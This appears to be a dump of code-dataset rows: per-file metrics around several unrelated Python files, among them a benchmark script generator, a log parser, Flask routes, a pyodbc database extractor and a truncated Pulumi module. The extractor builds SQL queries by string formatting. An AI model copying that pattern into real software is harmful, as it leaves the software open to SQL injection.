| 0.012656
| 0
| 0.891648
| 0
| 0
| 0.040856
| 0.016406
| 0
| 0
| 0
| 0
| 0.012792
| 1
| 0.214447
| false
| 0.015801
| 0.002257
| 0.043642
| 0.417607
| 0.015049
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9adb8ec86466a8e6cdf6edf477cb5731ea213328
| 7,482
|
py
|
Python
|
TeachMyAgent/run_utils/generate_benchmark_script.py
|
flowersteam/TeachMyAgent
|
a8f71cbfce4cb8ca6da24d00ea690495e3afbd2e
|
[
"MIT"
] | 45
|
2021-03-19T00:16:57.000Z
|
2022-03-20T14:02:18.000Z
|
TeachMyAgent/run_utils/generate_benchmark_script.py
|
flowersteam/TeachMyAgent
|
a8f71cbfce4cb8ca6da24d00ea690495e3afbd2e
|
[
"MIT"
] | 5
|
2021-04-26T06:21:10.000Z
|
2021-12-24T02:57:02.000Z
|
TeachMyAgent/run_utils/generate_benchmark_script.py
|
flowersteam/TeachMyAgent
|
a8f71cbfce4cb8ca6da24d00ea690495e3afbd2e
|
[
"MIT"
] | 5
|
2021-03-23T20:21:14.000Z
|
2022-03-22T14:55:11.000Z
|
import sys
if __name__ == '__main__':
'''
Generate a script launching all experiments needed to perform the full benchmark (both skill-specific and global performance) for a teacher.
'''
experiment_name = sys.argv[1]
experiment_arguments = ' '.join(sys.argv[2:])
nb_seeds = 16 # {}
with open("benchmark_scripts/full_benchmark_" + experiment_name + ".txt", 'w') as f:
f.write('#### PROFILING STUMPS\n')
for ek in ["no", "low", "high"]:
f.write('## {} Expert Knowledge\n'.format(ek))
f.write('# Mostly unfeasible task space\n')
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_1 '
'--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
'--max_stump_h 9.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal --*allow_expert_knowledge {} '
'--student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write('# Mostly feasible task space\n')
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_2 '
'--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
'--max_stump_h 3.0 --min_stump_h -3.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal '
'--*allow_expert_knowledge {} --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
'--nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write('# Ability to handle a student that can forget\n')
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_3 '
'--test_set parametric_stumps_test_set --reset_frequency 7000000 --keep_periodical_task_samples 250000 '
'--env parametric-continuous-stump-tracks-v0 --max_stump_h 3.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal '
'--*allow_expert_knowledge {} --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
'--nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write('# Handle discontinuous difficulty over task space\n')
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_4 --shuffle_dimensions '
'--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
'--max_stump_h 3.0 --max_obstacle_spacing 6.0 --walker_type old_classic_bipedal --*allow_expert_knowledge {} '
'--student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write('# Robustness over a variety of students\n')
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
'--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
'--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type spider --*allow_expert_knowledge {} '
'--*student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
'--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
'--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type small_bipedal --*allow_expert_knowledge {} '
'--*student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
'--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
'--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type spider --*allow_expert_knowledge {} '
'--*student ppo --lr 0.0003 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 -hs {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write(
'--slurm_conf curta_inria_long --nb_seeds {} --exp_name profiling_benchmark_stumps_{}_criteria_5 '
'--test_set parametric_stumps_test_set --keep_periodical_task_samples 250000 --env parametric-continuous-stump-tracks-v0 '
'--max_stump_h 3.0 --max_obstacle_spacing 6.0 --*walker_type small_bipedal --*allow_expert_knowledge {} '
'--*student ppo --lr 0.0003 --backend tf1 --steps_per_ep 500000 --nb_test_episode 100 --nb_env_steps 20 -hs {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write('#### PARKOUR\n')
f.write(
'--slurm_conf curta_inria_long --nb_seeds 16 --exp_name benchmark_parkour_{} --test_set walking_test_set_v1 '
'--keep_periodical_task_samples 250000 --env parametric-continuous-parkour-v0 --*walker_type old_classic_bipedal '
'--allow_expert_knowledge minimal --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
'--nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write(
'--slurm_conf curta_inria_long --nb_seeds 16+16 --exp_name benchmark_parkour_{} --test_set climbing_test_set_v1 '
'--keep_periodical_task_samples 250000 --env parametric-continuous-parkour-v0 --*walker_type climbing_profile_chimpanzee '
'--allow_expert_knowledge minimal --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
'--nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
f.write(
'--slurm_conf curta_inria_long --nb_seeds 16+32 --exp_name benchmark_parkour_{} --test_set swimming_test_set_v1 '
'--keep_periodical_task_samples 250000 --env parametric-continuous-parkour-v0 --*walker_type fish '
'--allow_expert_knowledge minimal --student sac_v0.1.1 --backend tf1 --steps_per_ep 500000 '
'--nb_test_episode 100 --nb_env_steps 20 {}\n'
.format(nb_seeds, experiment_name, ek, experiment_arguments)
)
| 74.82
| 148
| 0.64702
| 956
| 7,482
| 4.662134
| 0.144351
| 0.036123
| 0.027148
| 0.03702
| 0.87256
| 0.87256
| 0.859098
| 0.845187
| 0.841373
| 0.841373
| 0
| 0.054978
| 0.241513
| 7,482
| 99
| 149
| 75.575758
| 0.730396
| 0.000267
| 0
| 0.56383
| 1
| 0.074468
| 0.660563
| 0.24023
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010638
| 0
| 0.010638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9afd9b0d7afc637b94e1467881067432a844c938
| 3,406
|
py
|
Python
|
build/lib.linux-x86_64-2.7/timediff/log_parser.py
|
nomelif/time-diff
|
cc713399166d278855004b38e4911c2a07ed478f
|
[
"MIT"
] | 2
|
2016-04-08T20:14:31.000Z
|
2019-11-19T12:23:35.000Z
|
timediff/log_parser.py
|
nomelif/time-diff
|
cc713399166d278855004b38e4911c2a07ed478f
|
[
"MIT"
] | null | null | null |
timediff/log_parser.py
|
nomelif/time-diff
|
cc713399166d278855004b38e4911c2a07ed478f
|
[
"MIT"
] | null | null | null |
import time
import datetime
class LogParser():
"""
Class used to parse logs.
"""
first_time = None
"""
Time of the first line.
"""
previous_time = None
"""
Time of the previous line.
"""
def __init__(self):
"""
Empty _\_\_init\_\__ -method.
"""
pass
def parse_logs(self, log_arr, time_format, zero_pad=True):
"""
Function that parses a log-array as given by cli_input.CliInput. Returns a list of tuples from _parse_line_.
"""
logs = []
for line in log_arr:
logs.append(self.parse_line(line, time_format, zero_pad))
return logs
def get_diff(self, line, time_format, zero_pad=True):
"""
Parses a single line from a log-array. Returns the difference in time from the previous line
"""
msg_time = None
msg_time_set = False
if zero_pad:
line = line.zfill(2)
try:
try:
msg_time = time.strptime(line, time_format)
msg_time_set = True
except ValueError, v:
msg_time = line.split(v.args[0][26:])[0]
msg_time = time.strptime(msg_time, time_format)
if(msg_time.tm_year == 1900):
msg_time=time.struct_time((2001, msg_time.tm_mon, msg_time.tm_mday, msg_time.tm_hour, msg_time.tm_min, msg_time.tm_sec, msg_time.tm_wday, msg_time.tm_yday, msg_time.tm_isdst))
msg_time_set = True
else:
if(msg_time.tm_year == 1900):
msg_time=time.struct_time((2001, msg_time.tm_mon, msg_time.tm_mday, msg_time.tm_hour, msg_time.tm_min, msg_time.tm_sec, msg_time.tm_wday, msg_time.tm_yday, msg_time.tm_isdst))
msg_time_set = True
if msg_time_set:
if self.first_time == None and self.previous_time == None:
self.first_time = msg_time
self.previous_time = msg_time
time_diff_from_previous = time.mktime(msg_time) - time.mktime(self.previous_time)
self.previous_time = msg_time
return(time_diff_from_previous)
else:
return None
except ValueError:
return None
def parse_line(self, line, time_format, zero_pad=True):
"""
Parses a single line from a log-array. Returns the tuple [time from first line] [time from last line] : [line's contents]
"""
orig_line = line
msg_time = None
msg_time_set = False
if zero_pad:
line = line.zfill(2)
try:
try:
msg_time = time.strptime(line, time_format)
msg_time_set = True
except ValueError, v:
msg_time = line.split(v.args[0][26:])[0]
msg_time = time.strptime(msg_time, time_format)
if(msg_time.tm_year == 1900):
msg_time=time.struct_time((2001, msg_time.tm_mon, msg_time.tm_mday, msg_time.tm_hour, msg_time.tm_min, msg_time.tm_sec, msg_time.tm_wday, msg_time.tm_yday, msg_time.tm_isdst))
msg_time_set = True
else:
if(msg_time.tm_year == 1900):
msg_time=time.struct_time((2001, msg_time.tm_mon, msg_time.tm_mday, msg_time.tm_hour, msg_time.tm_min, msg_time.tm_sec, msg_time.tm_wday, msg_time.tm_yday, msg_time.tm_isdst))
msg_time_set = True
if msg_time_set:
if self.first_time == None and self.previous_time == None:
self.first_time = msg_time
self.previous_time = msg_time
time_diff_from_begin = time.mktime(msg_time) - time.mktime(self.first_time)
time_diff_from_previous = time.mktime(msg_time) - time.mktime(self.previous_time)
self.previous_time = msg_time
return(datetime.timedelta(seconds=time_diff_from_begin), datetime.timedelta(seconds=time_diff_from_previous), orig_line)
else:
return None
except ValueError:
return None
| 29.877193
| 181
| 0.716089
| 566
| 3,406
| 3.977032
| 0.157244
| 0.214571
| 0.143936
| 0.037317
| 0.802754
| 0.768992
| 0.737006
| 0.687694
| 0.687694
| 0.687694
| 0
| 0.014963
| 0.175866
| 3,406
| 114
| 182
| 29.877193
| 0.786961
| 0
| 0
| 0.756757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.013514
| 0.027027
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b111eda27fab665ec115875e9db3960414b8edeb
| 266
|
py
|
Python
|
built-in/TensorFlow/Official/cv/image_classification/GoogleNet_for_TensorFlow/inception/inception.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | null | null | null |
built-in/TensorFlow/Official/cv/image_classification/GoogleNet_for_TensorFlow/inception/inception.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | 3
|
2021-03-31T20:15:40.000Z
|
2022-02-09T23:50:46.000Z
|
built-in/TensorFlow/Official/cv/image_classification/GoogleNet_for_TensorFlow/inception/inception.py
|
Huawei-Ascend/modelzoo
|
df51ed9c1d6dbde1deef63f2a037a369f8554406
|
[
"Apache-2.0"
] | null | null | null |
from .inception_v1 import inception_v1
from .inception_v1 import inception_v1_arg_scope
from .inception_v1 import inception_v1_base
from .inception_v4 import inception_v4
from .inception_v4 import inception_v4_arg_scope
from .inception_v4 import inception_v4_base
| 29.555556
| 48
| 0.879699
| 42
| 266
| 5.142857
| 0.190476
| 0.361111
| 0.208333
| 0.291667
| 0.888889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.097744
| 266
| 8
| 49
| 33.25
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
b121e6cc0e778516760a8bcc6566a70132bd28a4
| 294
|
py
|
Python
|
project/carlos/routes.py
|
ArturoMorales93/Plataformas_II_Project
|
7dd54c8c5159a1eb8c761a3a8e4f4bfb96a078eb
|
[
"Unlicense"
] | 1
|
2021-01-29T15:16:49.000Z
|
2021-01-29T15:16:49.000Z
|
project/carlos/routes.py
|
ArturoMorales93/Plataformas_II_Project
|
7dd54c8c5159a1eb8c761a3a8e4f4bfb96a078eb
|
[
"Unlicense"
] | 12
|
2021-02-01T20:31:31.000Z
|
2021-04-15T07:34:54.000Z
|
project/carlos/routes.py
|
ArturoMorales93/Plataformas_II_Project
|
7dd54c8c5159a1eb8c761a3a8e4f4bfb96a078eb
|
[
"Unlicense"
] | 1
|
2021-03-08T23:34:37.000Z
|
2021-03-08T23:34:37.000Z
|
from flask import render_template
from . import carlos
@carlos.route('/es/iot', methods=['GET'])
@carlos.route('/iot', methods=['GET'])
def iot_es():
return render_template('es_iot.html')
@carlos.route('/en/iot', methods=['GET'])
def iot_en():
return render_template('en_iot.html')
| 21
| 41
| 0.687075
| 43
| 294
| 4.534884
| 0.348837
| 0.215385
| 0.2
| 0.164103
| 0.194872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115646
| 294
| 13
| 42
| 22.615385
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| true
| 0
| 0.222222
| 0.222222
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
b1491c48f541fa113534a4f7535e9a398435f37a
| 57
|
py
|
Python
|
1.py
|
qq861078848/testgit
|
6f5199e7c086f428903233073188840c71269853
|
[
"MIT"
] | null | null | null |
1.py
|
qq861078848/testgit
|
6f5199e7c086f428903233073188840c71269853
|
[
"MIT"
] | null | null | null |
1.py
|
qq861078848/testgit
|
6f5199e7c086f428903233073188840c71269853
|
[
"MIT"
] | null | null | null |
print("hello world")
print("hello world")
print("22222")
| 14.25
| 20
| 0.701754
| 8
| 57
| 5
| 0.5
| 0.5
| 0.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 0.087719
| 57
| 3
| 21
| 19
| 0.673077
| 0
| 0
| 0.666667
| 0
| 0
| 0.473684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b1948a8d85855dac9863c13dff560137403a3dcd
| 168
|
py
|
Python
|
snake_rl/utils/__init__.py
|
alex-petrenko/snake-rl
|
ca7000120985da7fcac4047747ad7937693abcfe
|
[
"MIT"
] | 1
|
2021-08-28T10:37:33.000Z
|
2021-08-28T10:37:33.000Z
|
snake_rl/utils/__init__.py
|
dre2004/snake-rl
|
ca7000120985da7fcac4047747ad7937693abcfe
|
[
"MIT"
] | null | null | null |
snake_rl/utils/__init__.py
|
dre2004/snake-rl
|
ca7000120985da7fcac4047747ad7937693abcfe
|
[
"MIT"
] | 1
|
2021-02-18T00:22:40.000Z
|
2021-02-18T00:22:40.000Z
|
from snake_rl.utils.vec import Vec
from snake_rl.utils.monitor import Monitor
from snake_rl.utils.logs import init_logger
from snake_rl.utils.numpy_utils import imshow
| 33.6
| 45
| 0.857143
| 30
| 168
| 4.6
| 0.4
| 0.26087
| 0.318841
| 0.463768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 168
| 4
| 46
| 42
| 0.907895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b1a8b7f94d4e922a43da3d18a9033014726c88f6
| 3,624
|
py
|
Python
|
extract.py
|
pduebel/geodasy-tests-generator
|
1851ba9e7be0a379b29da0fbd851e0bc58d49ddf
|
[
"MIT"
] | null | null | null |
extract.py
|
pduebel/geodasy-tests-generator
|
1851ba9e7be0a379b29da0fbd851e0bc58d49ddf
|
[
"MIT"
] | null | null | null |
extract.py
|
pduebel/geodasy-tests-generator
|
1851ba9e7be0a379b29da0fbd851e0bc58d49ddf
|
[
"MIT"
] | null | null | null |
def extract(db_file, test, proj):
import pyodbc
final_test_data = []
odbc_conn_str = 'DRIVER={Microsoft Access Driver (*.mdb)};DBQ=%s;'%(db_file)
conn = pyodbc.connect(odbc_conn_str)
cursor = conn.cursor()
if test == "SPT":
hole_select = "select distinct HOLE_ID from SPT where PROJ_ID='%s'"%(proj)
cursor.execute(hole_select)
holes = cursor.fetchall()
final_holes = [list(i) for i in holes]
for i in range(len(final_holes)):
data_select = "select SPT_BASE, SPT_N from %s where HOLE_ID='%s' and PROJ_ID='%s'"%(test, final_holes[i][0], proj)
cursor.execute(data_select)
data = cursor.fetchall()
test_data = [list(i) for i in data]
final_test_data.append(test_data)
if test == "SHDP" or test == "DP":
hole_select = "select distinct HOLE_ID from DPROBE where PROJ_ID='%s'"%(proj)
cursor.execute(hole_select)
holes = cursor.fetchall()
final_holes = [list(i) for i in holes]
for i in range(len(final_holes)):
data_select = "select DPSTART, BLOWS from DPROBE where HOLE_ID='%s' and PROJ_ID='%s'"%(final_holes[i][0], proj)
cursor.execute(data_select)
data = cursor.fetchall()
test_data = [list(i) for i in data]
final_test_data.append(test_data)
if test == "SV" or test == "HP":
hole_select = "select distinct HOLE_ID from TRIALPIT where PROJ_ID='%s'"%(proj)
cursor.execute(hole_select)
holes = cursor.fetchall()
final_holes = [list(i) for i in holes]
if test == "HP":
for i in range(len(final_holes)):
data_select = """select TPIT_TEST_DEPTH, TPIT_AVERAGE_DFLT from TRIALPIT
where (TPIT_TEST_TYPE='HP' or TPIT_TEST_TYPE='P' or TPIT_TEST_TYPE='HP>'
or TPIT_TEST_TYPE='HP<' or TPIT_TEST_TYPE='HP >' or TPIT_TEST_TYPE='HP <'
or TPIT_TEST_TYPE='H' or TPIT_TEST_TYPE='H>' or TPIT_TEST_TYPE='H >'
or TPIT_TEST_TYPE='H<' or TPIT_TEST_TYPE='H <' or TPIT_TEST_TYPE='P>'
or TPIT_TEST_TYPE='P >' or TPIT_TEST_TYPE='P<' or TPIT_TEST_TYPE='P <')
and HOLE_ID='%s' and PROJ_ID='%s'"""%(final_holes[i][0], proj)
cursor.execute(data_select)
data = cursor.fetchall()
test_data = [list(i) for i in data]
final_test_data.append(test_data)
if test == "SV":
for i in range(len(final_holes)):
data_select = """select TPIT_TEST_DEPTH, TPIT_AVERAGE_DFLT from TRIALPIT
where (TPIT_TEST_TYPE='SV' or TPIT_TEST_TYPE='V' or TPIT_TEST_TYPE='SV>'
or TPIT_TEST_TYPE='SV<' or TPIT_TEST_TYPE='SV >' or TPIT_TEST_TYPE='SV <'
or TPIT_TEST_TYPE='S' or TPIT_TEST_TYPE='S>' or TPIT_TEST_TYPE='S >'
or TPIT_TEST_TYPE='S<' or TPIT_TEST_TYPE='S <' or TPIT_TEST_TYPE='V>'
or TPIT_TEST_TYPE='V >' or TPIT_TEST_TYPE='V<' or TPIT_TEST_TYPE='V <')
and HOLE_ID='%s' and PROJ_ID='%s'"""%(final_holes[i][0], proj)
cursor.execute(data_select)
data = cursor.fetchall()
test_data = [list(i) for i in data]
final_test_data.append(test_data)
cursor.commit()
return final_holes, final_test_data
| 42.139535
| 126
| 0.554912
| 498
| 3,624
| 3.76506
| 0.124498
| 0.136533
| 0.192
| 0.209067
| 0.850133
| 0.850133
| 0.850133
| 0.795733
| 0.7792
| 0.7632
| 0
| 0.001643
| 0.328091
| 3,624
| 85
| 127
| 42.635294
| 0.768378
| 0
| 0
| 0.540984
| 0
| 0
| 0.45344
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0
| 0.016393
| 0
| 0.04918
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
492b9ee09e4de3543a88bdab1c0ca9eeea226c4e
| 19,340
|
py
|
Python
|
sdk/python/pulumi_linode/lke_cluster.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2019-05-02T21:14:37.000Z
|
2021-12-19T18:37:40.000Z
|
sdk/python/pulumi_linode/lke_cluster.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 79
|
2019-05-01T17:52:03.000Z
|
2022-03-31T15:31:56.000Z
|
sdk/python/pulumi_linode/lke_cluster.py
|
pulumi/pulumi-linode
|
dcdc078ddcad836dddf6f31879f0f0488bec33b4
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2019-05-02T00:37:23.000Z
|
2021-05-04T11:10:40.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['LkeClusterArgs', 'LkeCluster']
@pulumi.input_type
class LkeClusterArgs:
def __init__(__self__, *,
k8s_version: pulumi.Input[str],
label: pulumi.Input[str],
pools: pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]],
region: pulumi.Input[str],
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a LkeCluster resource.
:param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
:param pulumi.Input[str] label: This Kubernetes cluster's unique label.
:param pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]] pools: Additional nested attributes:
:param pulumi.Input[str] region: This Kubernetes cluster's location.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
"""
pulumi.set(__self__, "k8s_version", k8s_version)
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "pools", pools)
pulumi.set(__self__, "region", region)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="k8sVersion")
def k8s_version(self) -> pulumi.Input[str]:
"""
The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
"""
return pulumi.get(self, "k8s_version")
@k8s_version.setter
def k8s_version(self, value: pulumi.Input[str]):
pulumi.set(self, "k8s_version", value)
@property
@pulumi.getter
def label(self) -> pulumi.Input[str]:
"""
This Kubernetes cluster's unique label.
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: pulumi.Input[str]):
pulumi.set(self, "label", value)
@property
@pulumi.getter
def pools(self) -> pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]:
"""
Additional nested attributes:
"""
return pulumi.get(self, "pools")
@pools.setter
def pools(self, value: pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]):
pulumi.set(self, "pools", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
"""
This Kubernetes cluster's location.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _LkeClusterState:
def __init__(__self__, *,
api_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
k8s_version: Optional[pulumi.Input[str]] = None,
kubeconfig: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
pools: Optional[pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]]] = None,
region: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering LkeCluster resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] api_endpoints: The endpoints for the Kubernetes API server.
:param pulumi.Input[str] k8s_version: The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
:param pulumi.Input[str] kubeconfig: The base64 encoded kubeconfig for the Kubernetes cluster.
:param pulumi.Input[str] label: This Kubernetes cluster's unique label.
:param pulumi.Input[Sequence[pulumi.Input['LkeClusterPoolArgs']]] pools: Additional nested attributes:
:param pulumi.Input[str] region: This Kubernetes cluster's location.
:param pulumi.Input[str] status: The status of the node. (`ready`, `not_ready`)
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: An array of tags applied to the Kubernetes cluster. Tags are for organizational purposes only.
"""
if api_endpoints is not None:
pulumi.set(__self__, "api_endpoints", api_endpoints)
if k8s_version is not None:
pulumi.set(__self__, "k8s_version", k8s_version)
if kubeconfig is not None:
pulumi.set(__self__, "kubeconfig", kubeconfig)
if label is not None:
pulumi.set(__self__, "label", label)
if pools is not None:
pulumi.set(__self__, "pools", pools)
if region is not None:
pulumi.set(__self__, "region", region)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="apiEndpoints")
def api_endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The endpoints for the Kubernetes API server.
"""
return pulumi.get(self, "api_endpoints")
@api_endpoints.setter
def api_endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "api_endpoints", value)
@property
@pulumi.getter(name="k8sVersion")
def k8s_version(self) -> Optional[pulumi.Input[str]]:
"""
The desired Kubernetes version for this Kubernetes cluster in the format of `major.minor` (e.g. `1.17`), and the latest supported patch version will be deployed.
"""
return pulumi.get(self, "k8s_version")
